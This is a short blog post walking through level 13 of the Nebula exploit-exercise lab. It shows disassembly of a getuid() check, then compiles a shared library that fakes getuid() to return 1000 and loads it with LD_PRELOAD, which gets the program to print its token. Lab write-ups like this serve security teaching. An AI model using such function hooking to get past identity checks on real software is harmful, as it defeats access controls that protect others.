Saturday, December 22, 2012

Exploit Exercise - Level [13]

We have to get a token to solve this level. But there is a security check getuid()==1000. To bypass this check, we make a copy of flag13 binary, this removes setuid bit. Then we create a shared object and use LD_PRELOAD to hook getuid() call. Below is the solution 
0x080484ef <+43>: call   0x80483c0 <getuid@plt>
0x080484f4 <+48>: cmp    eax,0x3e8
0x080484f9 <+53>: je     0x8048531 <main+109>

level13@nebula:/home/flag13$ cp flag13 ../level13/
level13@nebula:/home/flag13$ cd -
/home/level13
level13@nebula:~$ ls -ld *
-rwxr-x--- 1 level13 level13 7321 2012-02-01 01:08 flag13

level13@nebula:~$ ./flag13 
Security failure detected. UID 1014 started us, we expect 1000
The system administrators will be notified of this violation

level13@nebula:~$ cat getuid.c
#include<unistd.h>
uid_t getuid(void)
{
    return 1000;
}
level13@nebula:~$ gcc -fPIC -shared -o lib.so getuid.c 
level13@nebula:~$ ls
flag13  getuid.c  lib.so
level13@nebula:~$ export LD_PRELOAD="/home/level13/lib.so"
level13@nebula:~$ ./flag13 
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
Posted by at
Labels:

No comments :

Post a Comment

Subscribe to: Post Comments ( Atom )